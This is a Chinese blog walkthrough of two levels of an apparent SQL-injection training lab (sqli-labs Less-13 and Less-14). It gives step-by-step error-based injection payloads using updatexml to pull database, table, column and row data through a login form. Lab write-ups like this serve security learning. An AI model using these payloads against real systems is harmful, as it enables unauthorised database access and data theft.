标签:update com 分析 base 原因 order by rom http cat
Less-13(报错盲注)
1.判断是否存在注入点
输入admin’时,出现如下报错信息,经过分析,存在注入点,且注入方式为:(‘’)
执行uname=admin‘)#&passwd=&submit=Submit,回显正确,但是没有信息,判断为报错型的盲注
2.判断回显位数
uname=admin‘) order by 2#&passwd=&submit=Submit 判断回显位数位数为2
3.爆数据库名
uname=admin‘) and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
4.爆表
uname=admin‘) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),0x7e),1)#&passwd=&submit=Submit
5.爆字段
uname=admin‘) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),0x7e),1)#&passwd=&submit=Submit
6.爆数据
uname=admin‘) and updatexml(1,concat(0x7e,(select group_concat(USER) from users),0x7e),1)#&passwd=&submit=Submit,报错显示如下,原因未知
还是换成emails来爆吧...
uname=admin‘) and updatexml(1,concat(0x7e,(select group_concat(id) from emails),0x7e),1)#&passwd=&submit=Submit
-------------------------------------------------------END----------------------------------------------------------------
Less-14(报错盲注)(与less-13基本一样)
1.判断是否存在注入点
当执行uname=admin"&passwd=&submit=Submit,出现报错信息,如下,当执行uname=admin"#&passwd=&submit=Submit,回显正确,
经过分析判断存在注入点,注入方式为:””
2.判断回显位数
uname=admin" order by 2#&passwd=&submit=Submit 判断的回显位数为2
3.爆库名
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
4.爆表
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),0x7e),1)#&passwd=&submit=Submit
5.爆字段
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘referers‘),0x7e),1)#&passwd=&submit=Submit
6.爆数据
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(id) from referers),0x7e),1)#&passwd=&submit=Submit
-------------------------------------------------------END----------------------------------------------------------------
标签:update com 分析 base 原因 order by rom http cat
原文地址:https://www.cnblogs.com/B-roin/p/12330667.html